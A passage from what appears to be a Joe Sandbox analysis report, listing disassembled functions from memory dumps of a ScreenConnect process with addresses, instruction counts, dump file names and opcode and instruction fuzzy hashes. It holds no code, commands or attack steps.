                                                                                                                                                                                                                                                        • Opcode ID: d920b5d266b8e40e9b6983db57f70c41c95be3ce7e1a2ab2ed184f60ecf3af69
                                                                                                                                                                                                                                                        • Instruction ID: 1f3639149ffccd96d36beb3d9f6049c7611075cae34790cd5974981ae3f88719
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d920b5d266b8e40e9b6983db57f70c41c95be3ce7e1a2ab2ed184f60ecf3af69
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08411231E002199BDB15DFA5C890BEEBBB5EF85704F14812AE405B7385DB70AD46CBA1
                                                                                                                                                                                                                                                        Function 00DDB2CF Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 110618595d16f927d17b3fb51d003ff868a7212ca75e8f5a273d13e9782a959b
                                                                                                                                                                                                                                                        • Instruction ID: bf26161a3f958c01f5d3e4080183d788986be539fe5ebf2661612d679f9cf2f6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 110618595d16f927d17b3fb51d003ff868a7212ca75e8f5a273d13e9782a959b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53514B74E503099FDB04DFA4E944B9DBBB5FF88300F208569E404AB365DB74A985CF50
                                                                                                                                                                                                                                                        Function 00DD9968 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f36b34c06aaeb30e7fe8f6b953cbac1220ad4bfa6d37be679bf55efca828178d
                                                                                                                                                                                                                                                        • Instruction ID: dc404cb5a3c634c85677c7f998ab6756bf63889371d721d5a2997ebf8b6d97b2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f36b34c06aaeb30e7fe8f6b953cbac1220ad4bfa6d37be679bf55efca828178d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9418A31B102148FCB14DB79E854AADBBF6EF88710B144569E806EB3A1DF759D05CBA0
                                                                                                                                                                                                                                                        Function 00DD6FEB Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fc211dda4d9666c75d0a6596036613e49b0aa141f95a481a799bb1d70a97e633
                                                                                                                                                                                                                                                        • Instruction ID: f377ee539ac491c64de0e3e7d8c695ae7a675be3fd2720515cfecd0264f16dba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc211dda4d9666c75d0a6596036613e49b0aa141f95a481a799bb1d70a97e633
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE31DF75B102594F8716EB7CA89196EB7AAEFC5340300897AD809DB384EF70DD098BE1
                                                                                                                                                                                                                                                        Function 00DD9978 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3638340b9344025e38bf990d5d415ff4ae06449c03caef6166b6f97664ccd86a
                                                                                                                                                                                                                                                        • Instruction ID: 2ed22a02e2c3e9bf5dcfb6b2aeccea85fa055c2352d310ca7a03551002c97759
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3638340b9344025e38bf990d5d415ff4ae06449c03caef6166b6f97664ccd86a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6415B357102148FC718DB79D864AADBBF6EF88710B14456AE806EB3A1DF71ED05CBA0
                                                                                                                                                                                                                                                        Function 00DD7920 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 65f589188a8ced9d6e588a1bab91e30d59ffedc5a36b4609d276b7ac4f9ed260
                                                                                                                                                                                                                                                        • Instruction ID: af9a2ae26c414320715a32421dcc28343a33071774377df7d483713560fef3e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65f589188a8ced9d6e588a1bab91e30d59ffedc5a36b4609d276b7ac4f9ed260
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27319031B042068FDB14DFA9C458AAEF7F6EF89354F1494AAD40AE7354EB31DD018BA0
                                                                                                                                                                                                                                                        Function 00DD846A Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 25c9ea1a36dc5fc9ec49add2a04f9fdfc8dfa269c26f0956e58faa999e0af502
                                                                                                                                                                                                                                                        • Instruction ID: dd22d260d6cceb35fba0f22bbb27a0ac92b23747390ce9cf268449ac6597766e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25c9ea1a36dc5fc9ec49add2a04f9fdfc8dfa269c26f0956e58faa999e0af502
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C314734600601CFC725CF29E994966B7F2FF89314B248A99D486CB765DB31FC06DB90
                                                                                                                                                                                                                                                        Function 00DD6FF8 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6aa8109fec1ec05210fd70205c03f1bd68cb81672d1ff41e34f953403e4bd95c
                                                                                                                                                                                                                                                        • Instruction ID: 950c63fa4686c7eddee03447dcfcd6b9b64dfaaa1c923394188e55ea27191b6b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6aa8109fec1ec05210fd70205c03f1bd68cb81672d1ff41e34f953403e4bd95c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B631D075B102195B8706EB7DA85196EB7EAEFC8350300893DD809DB384EF70ED098BE5
                                                                                                                                                                                                                                                        Function 00DDD7F8 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 77d58dfca0c6dfcd9eafa58b2166c7530978f9830f7f2da37f900312a3dbe8fc
                                                                                                                                                                                                                                                        • Instruction ID: b07e0a1d2639a6a69503fd323edf9ec38f3028c0a196479eb5e4f493b4917f0b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77d58dfca0c6dfcd9eafa58b2166c7530978f9830f7f2da37f900312a3dbe8fc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42312870A00B458FCB30DF29D84466ABBF2EF4A320B144A5DD4969B7A5D730E94ACF90
                                                                                                                                                                                                                                                        Function 00DD6568 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 010f1493974822a3cea433a8be70283a88cdb22ea069eb959b39dc1d125bbc37
                                                                                                                                                                                                                                                        • Instruction ID: 5e08de6e869d845ebeaa038d6ae20745fa1a00bee1c9e75e22f3ffd62b91dbaf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 010f1493974822a3cea433a8be70283a88cdb22ea069eb959b39dc1d125bbc37
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66311C706007018FC730DF29D844A6ABBF5EF89314B184A69D496DB7A5DB30E946CFE0
                                                                                                                                                                                                                                                        Function 00DDD808 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cc11afc50bc207da8974bf8a49f0970f7d5711a63bc206bf3ff486fa87b96c13
                                                                                                                                                                                                                                                        • Instruction ID: eb2fbc0aed032bdd2099f16c9c269e73eb6c60f9c8aed5ace2d00262e6e78eb5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc11afc50bc207da8974bf8a49f0970f7d5711a63bc206bf3ff486fa87b96c13
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00310A70600B058FCB30DF29D84466ABBF2FF49320B144A6AD496DB7A5D731E94ACF90
                                                                                                                                                                                                                                                        Function 00DD90A8 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9d99e704b735829311ad3c4c6e8042f024a0de3f659247b8a3b3360192f8ecb0
                                                                                                                                                                                                                                                        • Instruction ID: 441d3c093dc79b86a871f12caaf522f91905e3bf016f694a5c7549b9469828c7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d99e704b735829311ad3c4c6e8042f024a0de3f659247b8a3b3360192f8ecb0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20313E706007068FC730CF29D898A66B7F1EF89710B144A1DD496DB7A5D731E946CBA1
                                                                                                                                                                                                                                                        Function 00DDD9B0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dd39ca436b00455bbc37424e774c679a8d0999333b51f1b7450ee467a190160c
                                                                                                                                                                                                                                                        • Instruction ID: df893f7f2afb344b07c995697e4bd7303cba18b7ee59c36d875df999f95524a2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd39ca436b00455bbc37424e774c679a8d0999333b51f1b7450ee467a190160c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86312D346047018FCB30DF2AD84466ABBF2EF99310B149A2DD496DB7A5D730E946CF90
                                                                                                                                                                                                                                                        Function 00C5D688 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3284462676.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_c5d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 48ba66dba6c15f209b5e66657b8b7187c8ebe2467b9762fb6c5dfbdd1a8f7cb0
                                                                                                                                                                                                                                                        • Instruction ID: fb66a72412989445245c0226f5f7459a3c26a02d928144da401c7c11d1190672
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48ba66dba6c15f209b5e66657b8b7187c8ebe2467b9762fb6c5dfbdd1a8f7cb0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9214879100300DFCB25DF14D9C0F26BF65FB98315F208569EC0A0B25AC336D89AD7A2
                                                                                                                                                                                                                                                        Function 00DD36A0 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c5e51f2e97ca263d5cc53305b058f58c30b0388e86a330fd202886afb06373bd
                                                                                                                                                                                                                                                        • Instruction ID: 2f473a0ed68d52f1dd124a47ced0455b11c9b1a5b680627f83d76f7c5e3c4fcb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5e51f2e97ca263d5cc53305b058f58c30b0388e86a330fd202886afb06373bd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F21CFB5A10211DFCB04AF78D94856EBBB1FF883157188166D81AD7391EB30DD01CBB2
                                                                                                                                                                                                                                                        Function 00DD36B0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6a504d7d6e178e4bce62424ae2ad6a263bf12d6c0eafd6c1bddb265a1cccc40c
                                                                                                                                                                                                                                                        • Instruction ID: 6bf3a59e38acb8140edd581f62206004534f7ef530579df1c2d4f44238a7eb7a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a504d7d6e178e4bce62424ae2ad6a263bf12d6c0eafd6c1bddb265a1cccc40c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D321FDB4A10315DFCB00AF74D94856EBBB5FB49311B148166D82AD7391EB30ED01CBB2
                                                                                                                                                                                                                                                        Function 00DD86D0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e5befd1d614a3620bd6d92f44b1c8aa4bf2c5cdb076c66a661141dd79ce00fc6
                                                                                                                                                                                                                                                        • Instruction ID: 7852741f3987b90ad459c9f4cc3ae19f1476ffb44462f47aee51af366052eac2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5befd1d614a3620bd6d92f44b1c8aa4bf2c5cdb076c66a661141dd79ce00fc6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2213E306007059FC735CF25D848A96BBF5EF84320B248A2ED497977A1DB31E94ADFA0
                                                                                                                                                                                                                                                        Function 00DD8C2B Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c57871b60f7f11881bfd4f2a2d51cca1bbcbe5f669ab3753036dcd8ecbeb61a8
                                                                                                                                                                                                                                                        • Instruction ID: 800b69a0ff4ea501751567a46edb275b89da5b82dc5dbafea5d60df7a45bd551
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c57871b60f7f11881bfd4f2a2d51cca1bbcbe5f669ab3753036dcd8ecbeb61a8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D811CD307002485BC705EB78D981BAEBBA6EFC0341F048529E805EB399DF70AE09CB95
                                                                                                                                                                                                                                                        Function 00DDF2B4 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 605684e162109f57fe08c7188433234f21afbfe140cf3706b84f92aa7bbd5723
                                                                                                                                                                                                                                                        • Instruction ID: e4c98416c0ef52d698ede2600eb3142579c0a963789ecd90a5e25e74df00edde
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 605684e162109f57fe08c7188433234f21afbfe140cf3706b84f92aa7bbd5723
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B62134B6C002499FCB10CF9AD844ADEBBF5FF88310F14852AE919A7310C379A955DFA1
                                                                                                                                                                                                                                                        Function 00DDEB70 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9b41cafc90895535b8cddea0cf42a9959f8cc8a7a5f276e80419704106f33bee
                                                                                                                                                                                                                                                        • Instruction ID: 6f09c7c41dcd63c38d32e1a06d1b0b570dad6a9427c21de0bc39013bfde44383
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b41cafc90895535b8cddea0cf42a9959f8cc8a7a5f276e80419704106f33bee
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E81106302083909FD706DB29D451DA67FB1DF8731075A80DBE885CF2A6CA35DC42C721
                                                                                                                                                                                                                                                        Function 00DDA7B8 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bcffb38982b3a1a303a69928604dd2a5928af036831fd931669d36830a3ae50b
                                                                                                                                                                                                                                                        • Instruction ID: 226626315711f2706a2269ca7b378ef33001afbdbf091a811090e56ab732de98
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcffb38982b3a1a303a69928604dd2a5928af036831fd931669d36830a3ae50b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB21C970A007058FC724DF6DD944A6ABBF5EF48310B14CA2ED8A6D77A4D730E906DB91
                                                                                                                                                                                                                                                        Function 00DD8C30 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 34aac84ff0796f587450dc7e7b2d65f5d5edc2f88b81ced615ef8f685196f0ca
                                                                                                                                                                                                                                                        • Instruction ID: 5f8ee42147788e1739df0b5075b7d41850c6470f8c5e58ab5aea190b5a0196b5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34aac84ff0796f587450dc7e7b2d65f5d5edc2f88b81ced615ef8f685196f0ca
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6711D0757002485BC705EB68D981BAEBBA7EFC5341F008529E805EB399DF70AE09C7E5
                                                                                                                                                                                                                                                        Function 00DDE19F Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 94d3f2620dc6e1bdd298b3aefff0dd577d4fae4fc58230b8b14a3e68a50558a0
                                                                                                                                                                                                                                                        • Instruction ID: 4f1c32ccb687c0443ca3d391cf0c2ab98766811d9b88d8f9e79d195b465754c2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94d3f2620dc6e1bdd298b3aefff0dd577d4fae4fc58230b8b14a3e68a50558a0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63114230A002099FCB15DF68DD819AEBBB5EFC8350B108539E519DB355DB70AD05CB90
                                                                                                                                                                                                                                                        Function 00DDE1A0 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 229b79692e690f2d811767bc50420767f8f79bc862b74559f3434a0a5c553497
                                                                                                                                                                                                                                                        • Instruction ID: 8ad275b7e8c55232c5db4d7b61623fe2cea4cf17f99f27369807840ddecbcb15
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 229b79692e690f2d811767bc50420767f8f79bc862b74559f3434a0a5c553497
